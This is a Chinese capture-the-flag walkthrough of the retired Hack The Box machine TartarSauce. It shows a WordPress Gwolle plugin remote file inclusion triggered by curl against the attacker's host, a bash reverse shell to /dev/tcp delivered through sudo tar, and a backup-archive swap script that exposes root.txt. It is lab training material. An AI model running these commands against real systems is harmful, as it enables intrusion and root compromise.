zoukankan      html  css  js  c++  java
  • HTB-靶机-TartarSauce

    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.88

    本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

    执行命令 autorecon 10.10.10.88 -o ./TartarSauce-autorecon

    就开放了80端口

    没啥东西,想到上面nmap扫描出来了目录,都访问了下,没发现啥可利用的,再在此基础上进行目录爆破

    gobuster dir -u http://10.10.10.88/webservices/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 400 -x php,jsp,txt -o bmfx-tartarSauce-gobuster

    发现wp目录访问下

    是个配置错误的wordpress页面,使用wpscan扫描一把

    wpscan --url http://10.10.10.88/webservices/wp -e ap,t,tt,u --api-token pFokhQNG8ZFEmmntdfHfTYnrYdnvJHKtVtDuHTqTqBc

    我这里测试扫描没有扫描出来gwolle ,根据网上的资料存在此插件可以利用

    searchsploit gwolle
    searchsploit -m 38861
    https://www.exploit-db.com/exploits/38861

    根据上面的exploit得出适用于目标靶机的exploit,具体如下

    1.本地nc监听8833端口
    2.curl -s 'http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.5:8833/'
    3.查看nc返回的信息
    connect to [10.10.14.5] from (UNKNOWN) [10.10.10.88] 38198
    GET /wp-load.php HTTP/1.0
    Host: 10.10.14.5:8833
    Connection: close

    可以知道上面的远程文件包含漏洞测试成功,并且得知目标靶机会默认包含文件wp-load.php,可以我们本地kali构造跟其一样的名称文件,里面写入反弹shell代码即可

    本地nc监听8833端口 nc -lvnp 8833
    curl -s 'http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.5:8000/'

    顺手也执行了一把sudo -l 发现可以以用户onuma不要密码的情况下执行tar命令,那么可以通过tar执行命令横向移动到用户onuma

    echo -e '#!/bin/bash
    
    bash -i >& /dev/tcp/10.10.14.5/8866 0>&1' > bmfx.sh
    tar -cvf bmfx.tar bmfx.sh

    成功移动到用户onuma ,准备提权操作,下载pspy32文件在目标靶机上进行监控进程运行情况

    最终得知目标靶机上有每5分钟以root权限运行的程序,查看此文件代码

    #!/bin/bash
    
    #-------------------------------------------------------------------------------------
    # backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
    # ONUMA Dev auto backup program
    # This tool will keep our webapp backed up incase another skiddie defaces us again.
    # We will be able to quickly restore from a backup in seconds ;P
    #-------------------------------------------------------------------------------------
    
    # Set Vars Here
    basedir=/var/www/html
    bkpdir=/var/backups
    tmpdir=/var/tmp
    testmsg=$bkpdir/onuma_backup_test.txt
    errormsg=$bkpdir/onuma_backup_error.txt
    tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
    check=$tmpdir/check
    
    # formatting
    printbdr()
    {
        for n in $(seq 72);
        do /usr/bin/printf $"-";
        done
    }
    bdr=$(printbdr)
    
    # Added a test file to let us see when the last backup was run
    /usr/bin/printf $"$bdr
    Auto backup backuperer backup last ran at : $(/bin/date)
    $bdr
    " > $testmsg
    
    # Cleanup from last time.
    /bin/rm -rf $tmpdir/.* $check
    
    # Backup onuma website dev files.
    /usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
    
    # Added delay to wait for backup to complete if large files get added.
    /bin/sleep 30
    
    # Test the backup integrity
    integrity_chk()
    {
        /usr/bin/diff -r $basedir $check$basedir
    }
    
    /bin/mkdir $check
    /bin/tar -zxvf $tmpfile -C $check
    if [[ $(integrity_chk) ]]
    then
        # Report errors so the dev can investigate the issue.
        /usr/bin/printf $"$bdr
    Integrity Check Error in backup last ran :  $(/bin/date)
    $bdr
    $tmpfile
    " >> $errormsg
        integrity_chk >> $errormsg
        exit 2
    else
        # Clean up and save archive to the bkpdir.
        /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
        /bin/rm -rf $check .*
        exit 0
    fi

    分析得知后可以通过上述程序执行的过程等待30期间进行提权查看root.txt文件,具体参考:https://0xdf.gitlab.io/2018/10/20/htb-tartarsauce.html

    #!/bin/bash
    
    # work out of shm
    cd /dev/shm
    
    # set both start and cur equal to any backup file if it's there
    start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
    cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
    
    # loop until there's a change in cur
    echo "Waiting for archive filename to change..."
    while [ "$start" == "$cur" -o "$cur" == "" ] ; do
        sleep 10;
        cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
    done
    
    # Grab a copy of the archive
    echo "File changed... copying here"
    cp $cur .
    
    # get filename
    fn=$(echo $cur | cut -d'/' -f4)
    
    # extract archive
    tar -zxf $fn
    
    # remove robots.txt and replace it with link to root.txt
    rm var/www/html/robots.txt
    ln -s /root/root.txt var/www/html/robots.txt
    
    # remove old archive
    rm $fn
    
    # create new archive
    tar czf $fn var
    
    # put it back, and clean up
    mv $fn $cur
    rm $fn
    rm -rf var
    
    # wait for results
    echo "Waiting for new logs..."
    tail -f /var/backups/onuma_backup_error.txt

    成功拿到root.txt

  • 相关阅读:
    SLAB
    /proc/vmstat 详解
    swap空间可以有效缓解内存压力
    内存问题排查手段及相关文件介绍
    buddyinfo 内存碎片数据采集
    取得Linux系统的各种统计信息
    HTML的常用总结
    采用jquery同django实现ajax通信
    Django的quarySet
    Django-MySQL数据库使用01
  • 原文地址:https://www.cnblogs.com/autopwn/p/14108178.html
Copyright © 2011-2022 走看看